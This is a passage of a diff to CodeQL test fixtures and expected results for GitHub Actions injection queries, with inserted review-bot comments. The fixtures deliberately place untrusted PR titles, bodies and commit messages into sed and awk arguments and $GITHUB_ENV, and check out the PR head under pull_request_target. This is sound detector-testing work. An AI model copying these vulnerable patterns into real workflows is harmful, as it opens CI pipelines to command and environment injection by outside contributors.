"${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | Config | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | 
.github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | provenance | Config | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | Config | +| .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | 
provenance | Config | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | 
@@ -58,10 +57,10 @@ nodes | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | semmle.label | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | | .github/workflows/test7.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test7.yml:16:9:24:35 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test8.yml:26:9:32:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | semmle.label | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | -| .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | -| .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | semmle.label | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | | .github/workflows/test9.yml:19:9:27:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r 
'.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | | .github/workflows/test10.yml:20:9:26:6 | Uses Step | semmle.label | Uses Step | 
@@ -72,5 +71,11 @@ nodes | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:55:9:61:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | +| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | semmle.label | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | +| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | semmle.label | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | +| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | semmle.label | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | +| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | semmle.label | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | semmle.label | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> 
"$GITHUB_ENV"\n | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml b/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml index 09e540a0f1b0..59ea1564bdd0 100644 --- a/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml +++ b/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml @@ -1,15 +1,18 @@ name: Argument injection on: - issues: - types: [opened, edited] + pull_request_target: jobs: test1: runs-on: ubuntu-latest env: - TITLE: ${{github.event.issue.title}} + TITLE: ${{github.event.pull_request.title}} steps: + - name: Checkout + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} - run: echo "s/FOO/$TITLE/g" - run: sed "s/FOO/$TITLE/g" - run: echo "foo" | sed "s/FOO/$TITLE/g" > bar @@ -28,3 +31,6 @@ jobs: -e 's##${{ env.sot_repo }}#' \ -e 's##${TITLE}#' \ .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky + - run: | + BODY=$(git log --format=%s) + sed "s/FOO/$BODY/g" > /tmp/foo diff --git a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected index b5df9a2cbd3c..326cb935f7c0 100644 --- a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected 
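Review bot: The new `Checkout` step in the first hunk (`uses: actions/checkout@v4` with `ref: ${{ github.event.pull_request.head.ref }}`) carries no comment, so a reader of this fixture cannot tell whether the `pull_request_target`-plus-PR-head checkout is the subject of the test or incidental setup. Since the step added at the end of the file reads `git log` after this checkout, the checkout is what turns repository contents into untrusted input, and that deserves stating in the fixture; I would add above the step `# Under pull_request_target, checking out the PR head makes repository contents (e.g. commit subjects read via git log below) untrusted input.` Separately, `head.ref` is only a branch name resolved against the base repository, so for a fork PR that ref would not exist there; if the fixture is meant to mirror the real-world pattern, `head.sha` is the more typical form, though whether the query distinguishes the two is not visible from this hunk.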
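Review bot: The `run` block added in the second hunk (`BODY=$(git log --format=%s)` then `sed "s/FOO/$BODY/g" > /tmp/foo`) is the only case in this file whose taint source is not the `TITLE` env var, and nothing marks that; the earlier cases all read `$TITLE`, so the shift to a `git log` source is easy to miss when the expected output is later updated. I would add `# source: commit subject of the checked-out PR head (git log); sink: the sed script argument` above the step. The `sed` invocation is also given no input file, so it would read stdin at run time; that is harmless for a static fixture but worth a word if the step is ever executed, which is not something the hunk shows.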
@@ -1,27 +1,30 @@ edges -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | provenance | | -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | | -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | | -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | provenance | | -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | | -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | Config | +| 
.github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | nodes -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | -| .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | -| .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | -| .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | -| .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | semmle.label | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | -| .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n 
| -| .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | +| .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | +| .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | +| .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | +| .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | semmle.label | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | +| .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" 
config.json\n | +| .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | subpaths #select -| .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | sed | -| .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | sed | -| .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | sed | -| .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | awk | -| .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | sed | -| .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | -| .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | -| .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | +| .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | sed | +| .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | sed | +| .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | sed | +| .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | awk | +| .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | sed | +| .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | +| .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | +| .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | +| .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. 
